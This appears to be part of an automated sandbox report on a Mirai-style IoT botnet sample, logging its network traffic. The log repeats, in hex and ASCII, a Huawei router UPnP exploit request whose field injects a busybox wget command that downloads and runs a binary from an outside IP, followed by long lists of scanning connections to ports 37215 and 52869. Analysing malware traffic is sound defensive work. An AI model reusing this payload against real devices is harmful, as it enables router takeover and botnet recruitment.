xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.194.220.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.129.185.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.123.149.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.62.1.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.112.115.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.202.50.139:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.11.13.7:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.36.42.1:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.244.193.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.74.247.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.187.57.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.210.230.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.234.117.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.117.212.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.176.178.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.247.211.201:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.42.75.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.231.41.52:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.91.37.13:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.37.33.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.132.177.169:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.183.175.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.217.222.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.236.76.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.61.0.6:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.64.206.233:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.91.107.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.31.10.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.183.242.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.15.200.222:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.46.107.246:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.189.124.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.81.15.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.219.198.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.200.210.19:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.150.76.166:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.165.94.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.71.29.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.231.133.250:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.116.163.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.40.16.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.175.250.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.247.184.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.246.16.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.120.247.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.55.54.239:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.217.9.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.67.207.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.221.143.1:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.167.25.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.64.210.32:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.22.196.238:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.24.24.220:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.127.46.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.189.156.143:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.74.65.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.232.181.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.207.197.20:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.52.132.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.102.173.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.11.84.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.237.207.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.160.102.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.109.44.29:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.1.38.94:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.86.8.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.36.210.243:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.132.226.158:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.87.223.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.140.231.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.238.79.142:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.234.252.94:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.87.7.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.58.92.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.1.46.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.26.139.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.119.108.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.14.139.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.48.246.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.192.146.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.49.208.246:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.89.4.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.64.80.189:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.6.104.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.136.35.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.190.213.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.175.73.180:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.174.254.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.200.5.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.165.209.59:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.118.33.220:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.187.70.184:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.105.221.44:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.78.110.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.60.227.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.174.98.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.158.209.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.69.218.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.236.123.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.38.239.13:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.203.96.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.200.230.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.119.7.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.211.216.150:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.156.128.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.232.224.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.105.177.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.85.119.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.125.1.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.111.34.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.39.226.93:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.243.190.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.144.246.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.45.212.181:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.134.75.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.219.244.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.152.20.209:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.58.16.182:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.185.238.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.60.153.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.21.145.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.131.216.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.154.113.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.183.114.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.217.226.146:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.43.133.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.244.220.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.34.108.178:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.233.144.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.150.237.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.179.217.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.36.13.125:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.132.20.237:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.254.171.220:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.96.30.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.112.22.104:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.140.127.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.221.12.122:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.118.100.2:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.160.25.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.90.237.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.134.169.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.110.200.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.235.41.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.115.212.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.162.78.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.175.167.13:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.155.187.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.180.82.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.110.133.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.134.4.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.245.38.93:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.204.116.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.46.196.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.39.251.56:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.130.0.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.69.47.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 41.77.144.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 197.184.164.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:18040 -> 156.58.184.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:41604 -> 37.0.9.202:45
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.242.220.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.74.21.8:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.177.185.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.129.58.180:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.151.190.6:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.207.122.68:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.21.105.249:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.212.90.7:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.179.201.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.137.88.207:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.113.240.87:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.19.206.230:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.123.129.53:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.228.90.85:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.58.14.46:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.19.224.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.250.81.103:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.225.221.51:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.157.60.145:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.209.238.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.211.134.133:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.34.166.97:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.232.204.119:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.98.213.45:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.78.200.210:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.198.98.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.65.149.142:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.142.238.47:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.211.157.244:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.7.182.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.162.118.153:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.94.30.204:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.243.157.93:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.40.56.230:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 91.60.77.151:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 45.182.20.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:18046 -> 185.141.27.185:52869
